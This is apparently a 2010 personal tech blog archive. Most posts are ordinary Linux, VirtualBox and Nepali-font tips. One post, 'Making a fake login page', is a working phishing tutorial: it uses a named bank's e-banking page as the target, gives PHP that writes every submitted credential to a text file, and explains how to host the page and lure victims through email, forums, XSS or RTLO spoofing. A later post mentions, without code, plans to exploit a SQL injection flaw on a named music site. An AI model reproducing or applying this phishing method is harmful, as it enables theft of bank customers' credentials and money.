Monday 8 November 2010

Installing VirtualBox Addition in Backtrack 4 Final

I run ubuntu linux and Win XP and BT4 in the Virtual environment using VirtualBox OSE. There was no problem installing VirtualBox Guest Addition in XP, however, I had problem installing it in Backtrack 4 so I tried few things and finally was successful to solve it. And I thought to share with you as it might help you as well.

Just enter the following commands one after another in the terminal(konsole in BT 4) and you're done.

- mkdir /vboxguest

- mount /dev/hdc /vboxguest

- cd /vboxguest

- ./

- reboot

After the reboot, you'll see the VirtualBox Guest Addition working properly for your BT4 installation. Hope this helps.


Solving Wireless Disabled Problem in Ubuntu 10.10

I was experiencing problem enabling the wireless in HP DV6 and tried few solutions for it. Finally, I came with this small solution which might be useful for you too.

Follow the steps as follows:
- Turn on the wireless switch(it still looks like being turned off).

- Now you need to edit the NetworkManager.state file located at /var/lib/NetworkManager/.
So enter the following command in the terminal:

sudo gedit /var/lib/NetworkManager/NetworkManager.state

This will open the NetworkManager.state file in the text editor which will most probably look like below:


Now, change the line WirelessEnabled=false line to true and save and close the text editor.

Now, we'll have to use rfkill command to view and unblock the wireless device. Note that the rfkill command is the tool to enable and disable wireless devices such as WiFi and bluetooth.

In the terminal, run the command rfkill list which will list the wireless devices, their identifier(numeric value like 0, 1) and the status of blocking at software and hardware level.

Now, pick up the identifier of the wifi(in my case, its 0 for hp-wifi) and just issue the command rfkill unblock 0 and then reboot the system.

This should solve the problem for you. If not, drop your comment here and I'll try to find the best solution for you.


Thursday 14 October 2010

Two New Online Tools From Tech Gaun

I was getting bored with no task to do at home and thought of adding some features to the blog and came up with two new features.

The first feature is unicode nepali converter and this can be used to convert romanized nepali typed in english to unicode nepali.
Unicode Nepali Converter
The second feature is the converter that's capable of converting Bikram sambat(nepali date) to english A.D. and vice-versa.
Bikram Sambat to A.D & Vice-versa Converter

Hope you like these features. Have fun. :)


Download Nepali Fonts [Collection of few Nepali fonts]

If you are looking for some fonts, I've uploaded them for you.

This font pack includes Bharatvani Wide Font, Devanagari New, Himalb, HindiSanskrit, Kanchan, Kantipur, MtEverest, Rukmini, and Sagarmatha. If you need any other fonts and if you can't find through google search, drop the comment here and I will be finding them for you.

Download Nepali Fonts Pack

Hope this helps you. :)


Online Unicode Nepali to Kantipur/Preeti Converter

For some strange reason (or due to my unfamiliarity with Scribus), Scribus didn't show the Unicode Nepali text from story editor to the text frame so I searched for the online tool that would convert nepali unicode to the nepali fonts like kantipur or preeti. On doing the google search, I found an online tool that would do this task and I thought to share this with you guys.

In order to access the service, you can visit HERE.

Edit: The above link has been updated and another page has been referred to us in the comment.

NepalBhasa Converter, suggested in the comment section.

Hope you find this useful. Have fun :)


Wednesday 13 October 2010

Making a fake login page [tutorial on phishers for beginners]

This tutorial will give you basic idea of what phishers are and how to create a simple phisher. Please be sure to comment on this post.

A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.

Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.

b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.

c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).

d) Now create a PHP file called phisher.php and paste the code below:

$fp = fopen("passes.txt","a");

foreach ($_REQUEST as $var => $val)
    fwrite($fp, $var." = ".$val."\r\n");

e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:

<form action="phisher.php" method="POST" name="RetailSignOn">

f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use Be sure to create passes.txt and set proper permission in the webserver.

g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.

Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to

I hope you learn something from this phishing tutorial. Have fun. :)


Comparing two files under LINUX [Basic Linux Command - Part II]

In this post, I am going to introduce you the methods of comparing two files in LINUX and is the second article on the basic linux commands following the previous post.

For comparing two files, we can follow two step task. The first step would be counting the number of lines, words and characters in the two files. After this, we would be interested to check the difference in the lines.

We use wc command to find the newline(giving count for number of lines), word and byte counts for the specified file (or the standard input if any file is not specified.

Let me take an example of the following test.c file on which I will perform wc command.


#include <stdio.h>
int main (int argc, char *argv[])
    return 0;

samar@samar-laptop:~/Desktop$ wc test.c
6 13 88 test.c

So this file contains 6 lines, 13 words and 88 characters (actually bytes).
You can specify the multiple files at once with this command such as:

samar@samar-laptop:~/Desktop$ wc test.c test.cpp
6 13 88 test.c
9 18 112 test.cpp
15 31 200 total

This way, you can calculate and compare the lines, words and characters count between two files. Now, we will look on the way of comparing files line by line and seeing the difference in the line.

The diff command allows us to display the line-by-line difference between two files.

Lets view the content of two files 1.txt and 2.txt, then we will be issuing diff command to see the difference between these files line-by-line.

samar@samar-laptop:~/Desktop$ cat 1.txt
samar dhwoj acharya

samar@samar-laptop:~/Desktop$ cat 2.txt
saurya dhwoj acharya
my brother

samar@samar-laptop:~/Desktop$ diff 1.txt 2.txt
< samar dhwoj acharya
> saurya dhwoj acharya
> my brother

In the output, the lines in first file are identified with less than sign and lines in the second file are identified with greater than sign. This is how you can see the lines where two files differ with each other. Further, we have sdiff command which will allow you to merge the file differences side by side and view the differences easily. I'll let you explore this command on your own. Also, if you want case-independent comparison with diff command, you can use -i parameter.

Also, I would be more than happy if you try to learn other commands such as cmp on your own.

Hope you learn something from this. Have fun and Happy Vijaya Dashami. :)


Tuesday 12 October 2010

Download the Nepali songs from

This might be a minor hack but for some nepali music fans, it can be a great honeypot. I didn't see any option in the webpages to download the nepali mp3 songs available at so had to go with the alternative way when I needed to download tapoban maajha song of Jagadish Samal from this site.

For downloading mp3s from this site, you'll need to install the Downloadhelper firefox addon which I've already discussed in this blog.

Now after you downloaded this addon, go to NepaliCollection Music page and select among the artists available in the artists tab. After selecting the artists, you'll reach to the page with all the songs of that artist.

Now you can select the song you want to download and when you click on play selected option, the Downloadhelper icon will start to animate. Now click on that icon and you will be able to save the MP3 that is currently playing. This site has some really old songs too and the songs that you can't find usually. So its worth trying this trick.

Edit*: The site is vulnerable to SQL injection, maybe I might be writing some PHP script to easily give the download link of any MP3 the user wants to download. Needs some research over the vuln in the site, though.

Have fun with this trick. :)